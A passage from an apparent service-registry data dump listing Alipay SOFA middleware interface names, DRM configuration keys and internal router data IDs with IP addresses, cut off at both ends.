IT_FPORGASSETROBOT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.promobatchBatchSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.trafficcardsp.common.service.facade.TransportUserAddressBookServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pkgcore.common.service.facade.GrayRuleOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifprocess.loadtest.UserInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.50.115#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.imaspmng.common.service.facade.RightManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.linka:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.guardianConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cdp.common.service.facade.admin.FatigueHelperService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:charge@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.finriskcenter.common.facade.api.guardian.BizEventDefineServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileic.common.service.facade.ctid.spi.CtidFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.antschedulerconsole.facade.JobOpenApiFacade:1.0:ischedulerconsole@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.hyp.core.api.HyCheckTaskRunService:1.0:EC_record_replay_task@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:apires_UnifyCode@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_INSPECT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.publiccore.common.service.facade.msg.MsgSendCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.chaos.dig.facade.code.PullRequestEventTaskFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:communicate@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.prodquery.common.service.facade.standard.api.arrangement.ArrangementSearchQueryStdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkprodmng_dcsRuleRejectCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.links.common.service.facade.LinksRoomTokenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ideploy.common.service.facade.BizlineForecastDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.settlement.biz.service.trans.TransferService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csmobile.service.rpc.api.MypaIvrGwService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.erecon.common.service.facade.config.ErcQueryConfigRuleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.cfin.loancore.common.service.facade.cf.api.query.CfInstructionQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:addUvTagApplyApproval_CallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.cif.client.drm.TairToTbaseSwitch.shadowFullAccessToTbase,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finpwm.facade.api.DreamFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.afsc.common.service.assistinvestigate.core.RequireInvestigateServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.fincommonbff:name=com.alipay.fincommonbff.drm.MonthReport.annaDiagnoseDegrade,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.appxcore.common.service.facade.api.item.ItemMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundtaskcenter.clear.common.service.facade.ConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkdataporter.common.service.facade.api.sync.LearningQuestionProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rinsight.biz.customized.spi.StrategyInfoSpi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.org.OrganizationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:amlmatrix_riskListOnlineCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.208.151#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.mashup:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.defaultEncodeTestRunSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.settlequery.common.service.facade.deposit.api.OnlineDepositBatchQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundmng.common.service.integration.fintradecenter.FintradeOrderQueryFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promox.facade.crowd.CrowdDivideFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hpmweb.CloudBuild:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.antdld.agent.drm.DrmConfig.bizVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mydds.biz.open.api.facade.ServicePurviewService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ccr.facade.RefundBillQueryFacade:1.0.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.uioservice.common.service.facade.api.ContentInfoStorageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.huanyu.facade.change.ChangePlanCallback:1.0:icsmng_grayAbility_changePlanCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.forest.UserDynamicsService:1.0:antforest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rccenter.common.service.facade.xcpt.CoCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.securitysimulate.common.service.client.drm.SimulateFlowResource.integrationStopAttribute,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.volvo.biz.aiya.topo.NodeExecService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secbianque.rest.ApiIndicatorOperator#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.rulemng.common.service.facade.rule.RuleModelManageService:1.0:promo@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.cif.client.drm.ClientCustomerSlimSwitch.shadowFullAccessSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbodmp.common.service.facade.api.MdatasyncMatchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitydata:name=com.alipay.securitydata.common.service.function.drm.FunctionPublishResource.publishAll,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_S_TEST_CONFLICT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ecocheck.common.service.meshypromo.MeshypromoResultFacade:1.0:meshyopt@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.182.188#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.52.96.94#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.publiccore.common.service.facade.label.CustomLabelFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.riskmngTairCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitycore.common.service.facade.biometric.fingerprint.api.FingerprintMobileService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yuyan.deploy.OperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:computeCheckExecuter$1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.insproductcore.facade.service.InsTableFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.iexratecenter.service.facade.api.ExRateCodeConfigQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.execute.ChangeServiceWorkFlowCheckFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-antshopkoi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_TEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.fc.mif.common.service.facade.MerchantRoleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.prizecore.common.service.facade.service.PremiumPrizePublishService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antinvoice.common.service.facade.api.EinvScriptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acprodapicore.facade.manageapi.ProviderManager:1.0:core@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopprod.common.service.item.facade.ProteinDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zbdm.common.service.facade.portrait.BdmPortraitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundbudget.facade.api.FundBudgetQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fccfpcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.service.facade.InsChannelFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.filebridge.service.facade.FileBridgeSlipService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.139.210#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mychain.dl.facade.PfBizWhiteListQueryFacade:1.0:dev@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitydata:name=com.alipay.securitydata.common.service.client.gbase.impl.GeaBaseControlResourceImpl.riskTopologyTestOn,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.mif.common.service.facade.MerchantShopFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:preContractPushToVaildHandle@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.WTOperateTraceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:ecsign@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antprivacy.inspect.manager.PunishManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.activity.ActivityTaskManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkprodmng_addContractCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.core.config.drm.MftransSnapshotMsgDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.framodel.core.service.facade.api.FramodelModelDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","sandbox-home-node-ip-dev#@#DEFAULT_INSTANCE_ID#@#SANDBOX-HOME","com.alipay.ebppprod.common.service.facade.deduct.PDeductSignFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.service.facade.flow.FlowModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.cif.client.drm.CifQueryLocalCacheSwitcher.localcacheProvider,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.openCountDimension,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.custdecision.service.facade.StatisticInfoQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rone.biz.facade.intelligent.eval.IntelligentEvalService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.145.209#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.timeout.common.service.facade.api.TimeoutExecutor:1.0:mabp@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insassetprod.common.service.facade.property.screen.MobileScreenAcceptanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.admediamgr.common.service.facade.load.MediaLoadBasicFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.241.26#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.bstsolprod.instalment.facade.api.mng.FreezeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.wishsavings.WishSavingsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.oyz.core.task.facade.api.TaskLinkageFacade:1.0:testcaseTaskLinkageFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpipe.zqueue:qaZQueue47:twolevel#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.zqualitywalleetoe.common.service.facade.api.TBApiInvokeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctransquery.common.service.facade.api.OrdinaryAccountLogQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.airbops.biz.changemng.drm.ChangemngDrmConfig.simpleFormat1,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finstore.common.service.facade.showhold.ShowHoldConfigMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.clearingcenter:name=com.alipay.clearingcenter.core.config.drm.PdEvCodeDrmResource.transCodeTypeElements,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditbenefit.facade.service.BenefitTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchcommerce.mrchlabcore.common.service.facade.api.entrance.EntranceCodeManageGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinpromo.common.service.facade.api.goal.SmallGoalService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoplaycenter.common.divideup.facade.api.DivideUpFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antinvoice.biz.flow.manager.UserTradeOpenManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:gfacceptance.product.CostAccruedProduct@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbtraffic.common.service.facade.api.DistributionBindFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ifinworks.common.service.facade.cicada.CollectionRecoveryRuleControlService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.merchant.facade.api.MerchantScoreFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.resource.common.facade.api.TenantOpenService:1.0:dpresource@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accenter.service.query.api.AccenterEntryQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.62#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.instopen.service.facade.comanagement.ComanagementFileFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.taobao.place.triple.StoreWriteTripleService:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.crmhome.common.service.facade.menu.CrmMenuManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdatasync.common.service.facade.DCDataSyncFacade:1.0:mbillexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeexprod:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInUserIdLocateValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.revcore.common.service.facade.api.report.FeeDetailReportQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acorchestracore.endpoint.sofarest.ServiceInstanceRestService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:mrchiscore_batchAdjustProcessCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findecision:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixContains,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.certifymng:name=com.alipay.grayprod.change.drm.ChangePolicy.targetConfigTables,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antassistant.biz.home.rpc.CardsServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mfinpromo.common.service.facade.question.api.QuestionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","NS_Pub_Servers_TP_B_FUND#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.83.242.165#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.taskcenter.common.service.facade.callback.ProcessTaskCallback:1.0:yebguardianFireWall@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.18.116.47#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promoplaycenter.common.service.facade.api.SignUpFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instpay.settleprod.service.facade.gcard.GCardDepositFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clivecenter.common.service.facade.api.ClcUpdateServerCapacityService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.picture.facade.PictureService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.165.169.157#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.dwdssp.service.UploadFileService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.160.162#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finworks.common.service.facade.hvps.HvpsLoginCallbackService:1.0:finslip@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.voucherprod.facade.api.fundscheme.FundSchemeBudgetManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcbmarketcenter:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.pkgCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.ck:name=com.alipay.zdal.config.groupCluster.apaylife_ds.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cfmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableGlobalCrc,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_C_PHONE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.echox.service.EchoxAopPlaybackService:1.0:insxhbclaimprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctrans.core.front.api.CacheDetailManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.elf.facade.console.rule.RuleManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.acquirefront.service.facade.api.AcquireAddAndPayOrderPayService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.notExistExpireTimeMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.charge:name=com.alipay.cif.client.drm.NearDataTairRouterSwitcher.modelBlackConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_DEFAULT_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.opencore.service.facade.AuthTextManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sffcore.MngOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.smcp.facade.content.RecommendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxtrade.common.service.facade.order.AdviceOrderManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfocore.common.service.facade.cds.mng.StrategyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.zcache.tbase.customerTairCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mshopprod.common.service.facade.rate.ShopRateManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revtrans.common.service.facade.api.AccountPageQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fop.api.MsgContentConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctrans.service.facade.CacheConfigManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_SDLTEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.39.187.208#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.RecSwitcher.isSwitchMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.equity.common.schedule.api.ScheduleConfigService:1.0:equitymarketscore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.96.200#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.riskmng.common.service.facade.api.ContentTaskInfoService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.checkMvelBlackKeyWords,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchstoreapp.store.biz.ecard.EcardOpenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbitemprod.common.service.facade.backend.api.SellerQueryBackendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.forumactivity.api.ForumActivityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.224.168#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ipsponsorprod.common.service.facade.api.protect.ProtectPotFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.cif.client.drm.CifQueryLocalCacheSwitcher.shadowExpireTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zpublishuiweb:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandQueueSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbservcore.common.service.client.spi.SPInterface:1.0:kbmallSPInterface@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.income.common.service.facade.BillQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insleads.common.service.facade.relation.ServiceRelationFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.guardianconsole.facade.configs.service.GuardianConfigFacade:1.0:mybankguardian@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cschannel.common.service.facade.api.CliveGroupService:1.0.0:incService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.promotion.common.service.facade.api.activity.ActivityConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.download.DownloadCenterCallbackInterface:1.0:manageDetailDownloadCenterCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.200.87#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finscene.common.service.facade.api.StrategyQueryFacade:1.0:finscene-surge@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.speech.api.feed.UserFeedQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.asset.AssetFluxService:1.0:financingcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_CRMHOME#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.179#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promocommopt.com.service.facade.api.SelfMarketingPromoCampQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ALIPAYJSESSIONID.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.166.80.155#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finannafccore.common.service.facade.annotation.api.IntentSolutionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.drc.rm.endpoint.openapi.CommonPublicApiFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.hyp.common.service.facade.facade.OneKeyContractFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxianmerchant.common.service.api.bxh.InsCrowdGroupServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.insttrade.core.service.drm.LargePayBankTaskInfoDRM.cutOffInterval,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.69.213.123#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.secucommunity.common.service.facade.counter.api.CounterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.risk.api.PluginProcessService:1.0:uctfront@DEFAULT#@